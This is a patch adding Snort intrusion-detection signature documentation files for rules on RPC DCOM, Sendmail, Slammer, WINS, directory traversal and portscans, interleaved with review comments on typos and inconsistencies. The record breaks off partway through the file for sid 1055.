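Review bot: the second paragraph of Detailed Information is a comma splice: "compromise the database backend for the application, the attacker may also be able to execute system binaries" should be split into two sentences. The Summary's "may indicate that an exploitation attempt has been attempted" is redundant, the third paragraph is the generic credential-validation boilerplate that does not describe SQL injection and repeats "running ona web server", and the file opens with two blank lines with no blank line before the separators after Sid, Affected Systems and Contributors.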
--- /dev/null
+++ b/doc/signatures/100000349.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000349
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ezupload Pro" application running on a webserver. Access to the file "initialize.php" using a remote file being passed as the "path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path" parameter in the "initialize.php" script used by the "Ezupload Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ezupload Pro
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
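Review bot: the Attack Scenarios text (an attacker supplying credentials to an authentication mechanism) does not match the remote file include described in the Summary and Detailed Information; it should say that the attacker passes the URL of a remote file in the "path" parameter of "initialize.php". Wording: "an exploitation attempt has been attempted" is redundant, "ona web server" should be "on a web server", and "attackers choosing" should be "attacker's choosing". Additional References is empty; the vendor or vulnerability advisory for this issue should be listed there.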
--- /dev/null
+++ b/doc/signatures/3401.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3401
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
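Review bot: typo in Ease of Attack: "Expoit code exists" should be "Exploit code exists". The Attack Scenarios paragraph (a request for a file with an overly long filename via a network share) is not connected to the RPC port overflow described in Detailed Information; one sentence linking the long filename to the malformed RPC request would help. Additional References is empty, so the Microsoft bulletin for this RPC DCOM vulnerability should be cited, and the tab-indented Affected Systems list is inconsistent with the unindented lists used elsewhere in this patch.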
--- /dev/null
+++ b/doc/signatures/3391.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3391
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
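Review bot: this file is identical to 3401.txt above, including the "Expoit" typo in Ease of Attack and the empty Additional References section. If sids 3391 and 3401 detect different traffic, the Summary of each should say what distinguishes them; otherwise the duplicated text will drift the first time one copy is corrected.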
--- /dev/null
+++ b/doc/signatures/1703.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1703
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
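Review bot: Affected Systems is empty; either list the affected servers or state "All." as the sfPortscan files in this patch do. Also drop the stray comma in "technique, to browse", add the missing full stops after "None known" and "Apply the appropriate vendor supplied patches", and remove the trailing space on the "-- " separator before Additional References, which is itself empty.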
--- /dev/null
+++ b/doc/signatures/2269.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2269
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
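Review bot: Affected Systems says "All systems using Sendmail" while Detailed Information limits the bug to Sendmail prior to version 8.12.9; change it to "Sendmail versions prior to 8.12.9". Typo in Corrective Action: "verison" should be "version", and since the fixed version is already named in Detailed Information, "Upgrade to Sendmail 8.12.9 or later" is more useful than "the latest non-affected version".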
--- /dev/null
+++ b/doc/signatures/2003.txt
@@ -0,0 +1,79 @@
+Rule:  
+
+--
+Sid:
+2003
+
+--
+Summary:
+
+This event is generated when an attempt is made by the "Slammer" worm to compromise a Microsoft SQL Server.
+
+--
+Impact:
+A worm targeting a vulnerability in the MS SQL Server 2000 Resolution 
+Service was released on January 25th, 2003.  The worm attempts to 
+exploit a buffer overflow in the Resolution Service.  Because of the 
+nature of the vulnerability, the worm is able to attempt to compromise 
+other machines very rapidly.
+
+--
+Detailed Information:
+The Monitor Service provided by MS SQL and MSDE uses unchecked client
+provided data in an SQL version check function.
+
+The worm attempts to exploit a buffer overflow in this version request.
+If the worm sends too many bytes in the request that triggers the 
+version check, then a buffer overflow condition is triggered resulting 
+in a potential compromise of the SQL Server.
+
+--
+Affected Systems:
+This vulnerability is present in unpatched MS SQL Servers.  The following unpatched services containing MS SQL or Microsoft Desktop Engine (MSDE) may potentially be compromised by this worm:
+
+* SQL Server 2000 (Developer, Standard, and Enterprise Editions)
+* Visual Studio .NET (Architect, Developer, and Professional Editions)
+* ASP.NET Web Matrix Tool
+* Office XP Developer Edition
+* MSDN Universal and Enterprise subscriptions
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Exploits for this vulnerability have been publicly published.
+
+A worm has been written that automatically exploits this vulnerability.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Block external access to the MS SQL services on port 1433 and 1434 if 
+possible.
+
+Patches from Microsoft are available that fix this vulnerability.  The 
+patches are available from
+
+www.microsoft.com/technet/security/bulletin/MS02-039.asp
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
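Review bot: the Impact section contains worm background (release date, propagation behaviour) rather than the impact of the event; move that text into Detailed Information and state the impact itself here (compromise of the SQL Server). Detailed Information calls the target the "Monitor Service" while Impact calls it the "Resolution Service"; use one name. The MS02-039 link in Corrective Action lacks a scheme ("http://") and belongs under Additional References, which is currently empty.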
--- /dev/null
+++ b/doc/signatures/1407.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1407
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
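Review bot: typo "ona web server" should be "on a web server", and "attackers choosing" (twice) should be "attacker's choosing". The Summary refers to "a known vulnerability" but nothing in the file identifies which PHP application or vulnerability sid 1407 covers, and Additional References is empty, so a reader cannot tell what traffic this rule actually matches.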
--- /dev/null
+++ b/doc/signatures/122-19.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-19
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
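Review bot: typos: "reconnaisance" should be "reconnaissance" and "consititute" should be "constitute". "Apply any appropriate vendor supplied patches as appropriate" repeats itself; drop one "appropriate". Impact speaks of "targeted systems" in the plural while Corrective Action says "the target host"; a portsweep touches multiple hosts, so use the plural consistently.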
--- /dev/null
+++ b/doc/signatures/2585.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2585
+
+--
+Summary:
+This event is generated when an attempt is made to probe for a known 
+vulnerability on a web server or a web application resident on a web
+server using Nessus.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to ascertain wether or
+not a Web server or an application running on a web server is subject
+to a possible vulnerability using the tool Nessus.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+An attacker merely needs to use Nessus against a server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
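Review bot: False Positives "None known" is inconsistent with the 122-* sfPortscan files in this patch, which acknowledge that authorised security audits and penetration tests generate the same traffic; a Nessus scan run by the site's own team will fire this rule, so record that and suggest excluding or tuning for the scanner hosts. Typo: "wether" should be "whether". The paragraph on credential validation is generic boilerplate that does not describe a Nessus probe.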
--- /dev/null
+++ b/doc/signatures/1876.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1876
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
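Review bot: typo "ona web server" should be "on a web server", and "attackers choosing" (twice) should be "attacker's choosing". Apart from the sid this text is identical to 846.txt and 1407.txt; the Summary's "known vulnerability" is never identified and Additional References is empty, so the per-rule specifics a reader needs are missing.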
--- /dev/null
+++ b/doc/signatures/122-5.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-5
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
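Review bot: same typos as 122-19.txt: "reconnaisance" and "consititute", and the same redundant "any appropriate ... as appropriate" wording in Corrective Action. The Summary says "tcp filtered portscan" but nothing explains what "filtered" means for this event beyond the pointer to README.sfportscan; one sentence distinguishing it from the unfiltered portscan event would help an analyst triaging the alert.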
--- /dev/null
+++ b/doc/signatures/1582.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1582
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
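Review bot: "the attackers choosing" should be "the attacker's choosing". The Summary refers to a "known vulnerability" but the file never identifies which, the credential-validation paragraph is the same generic text used in 2585.txt and the CGI files, and Additional References is empty; at minimum the Summary should say what request pattern sid 1582 matches.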
--- /dev/null
+++ b/doc/signatures/3017.txt
@@ -0,0 +1,68 @@
+Rule: 
+
+--
+Sid: 
+3017
+
+-- 
+Summary: 
+An oversized request was sent to a WINS server.
+
+-- 
+Impact: 
+Client-supplied data is written to client-specified locations in memory,
+allowing for arbitrary code execution. Since WINS servers run with
+administrative privileges, this allows an attacker to gain
+administrative access remotely without any prior authentication.
+
+--
+Detailed Information:
+Vulnerable WINS servers write client-supplied data to a client-supplied
+memory address. This allows clients to supply arbitrary code for
+execution with administrative privileges. This attack does not require authentication.
+
+In order to reduce false positives, the rule looks for requests that are
+greater than 204 bytes. As the maximum length of a hostname is 192
+bytes, and a standard request has 12 bytes of headers, no standard
+request should exceed this length. Additionally, this rule checks to see
+if particular flags that are required to exploit this vulnerability are
+set in the client request.
+
+--
+Affected Systems:
+Microsoft Windows servers running the WINS service.
+
+--
+Attack Scenarios: 
+Since WINS clients are programmed to not exceed the maximum length for a
+request, an attacker would need to use a script which generated
+malformed WINS requests.
+
+-- 
+Ease of Attack: 
+Simple; exploits exist.
+
+-- 
+False Positives:
+This rule will generate false positives when replication occurs.
+Additionally, there may be unknown scenarios which generate false positives.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+See the Microsoft Knowledge Base article referenced below.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://support.microsoft.com/kb/890710
+
+--
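Review bot: False Positives says replication generates false positives but gives no tuning guidance; add a note that traffic between known WINS replication partners can be excluded so the rule stays usable where replication is in place. The separators alternate between "--" and "-- " (trailing space); make them consistent. The 192 + 12 = 204 byte threshold reasoning in Detailed Information is exactly what these files should contain.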
--- /dev/null
+++ b/doc/signatures/846.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+846
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
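Review bot: typo "ona web server" should be "on a web server", and "attackers choosing" (twice) should be "attacker's choosing". This file is identical to 1876.txt except for the sid; the Summary's "known vulnerability" is not identified and Additional References is empty.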
--- /dev/null
+++ b/doc/signatures/100000126.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+100000126
+
+-- 
+Summary: 
+This event is generated when an attempt is made to overflow a buffer in the 
+GoodTech Telenet server.
+
+-- 
+
+Impact: 
+The affected server will be crashed, and remote code execution with the 
+privileges of the user running the telnet server is possible.
+
+--
+Detailed Information:
+If the GoodTech telnet server recieves 10,083 bytes before a newline, a buffer 
+will be overflowed. If properly crafted data is sent, arbitrary code may be 
+executed with the privileges of the user running the server. Note that the rule 
+looks for 1,000 or more bytes before a newline, due to limitations which do not 
+allow a search for the full number of bytes required for the exploit.
+
+--
+Affected Systems:
+GoodTech Telnet Server 4.0
+GoodTech Telnet Server 5.0
+
+--
+
+Attack Scenarios: 
+A script must be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to version 5.0.7 of the affected software.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
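Review bot: the "None Known" under False Positives does not square with Detailed Information, which says the rule fires on 1,000 or more bytes before a newline while the overflow needs 10,083; any legitimate line longer than 1,000 bytes will trigger it, so that should be recorded as a known false positive. Typos: "Telenet" in the Summary should be "Telnet", and "recieves" should be "receives". Affected Systems lists version 5.0 while Corrective Action says to upgrade to 5.0.7; "versions prior to 5.0.7" would be more precise.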
--- /dev/null
+++ b/doc/signatures/679.txt
@@ -0,0 +1,78 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+	
+--
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_sp_addp_0awi.asp
+
+--
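Review bot: the Sid field is empty; the file name indicates 679, so fill it in. The Detailed Information sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell..." is copied from a telnet signature and does not apply to a command sent over a database connection; remove or rewrite it. Attack Scenarios ("Simple. These are SQL database commands.") describes ease rather than a scenario; say how the command reaches the server instead. The Corrective Action sentence ending "signs of compromise" is missing its full stop.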
--- /dev/null
+++ b/doc/signatures/1055.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1055
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
